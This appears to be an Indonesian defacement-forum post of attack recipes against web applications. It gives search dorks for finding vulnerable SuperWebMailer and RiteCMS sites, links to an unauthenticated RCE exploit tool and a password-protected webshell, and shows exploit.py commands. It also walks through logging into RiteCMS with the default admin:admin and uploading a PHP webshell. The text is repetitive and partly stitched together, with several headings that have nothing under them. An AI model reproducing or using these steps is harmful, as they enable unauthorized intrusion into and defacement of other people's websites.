Usage? python3 exploit.py http://target.com/ shell.php
Akses?
Usage? python3 exploit.py http://target.com/ shell.php
Akses?
Deface Poc SSTI to RCE
Laravel RCE via Web Apps
Unauthentication RCE SuperWebMailer
Dork :
inurl:/swm/defaultnewsletter.php
Tools :
https://github.com/Aryaalfahrezi010/RCE_SuperWebMailer
Shell:
https://raw.githubusercontent.com/linuxsec/indoxploit-shell/master/shell-v3.php Pass IndoXploit
Oke pertama kita dorking dulu seperti biasa
Pilih web yg lo mau terserah
Nah Habis Itu lu hapus bagian defaultnewsletter.php
jadi (https://sitelu.com/swm)
habis itu lu install tools nya gblk
pakek python3 ya itu jangan lupa
python3 exploit.py -u https://sitelu/swm/
Nanti kalo vuln ada tulisannya kyak dibwh ini
RiteCMS 2.2.1 - Authenticated Remote Code Execution
Vendor Homepage: http://ritecms.com/
Version: 2.2.1
Dork:
intext:"Powered By RiteCMS"
1- Go to following url. >> http://(HOST)/cms/
2- Default username and password is admin:admin. We must know login credentials.
3- Go "Filemanager" and press "Upload file" button.
4- Choose your php webshell script and upload it.
shell access?http://target.com/media/yourshell.php
Ref? Rite Cms
Contact : ncdream72@gmail.com
Deface Poc Computer Based Test RCE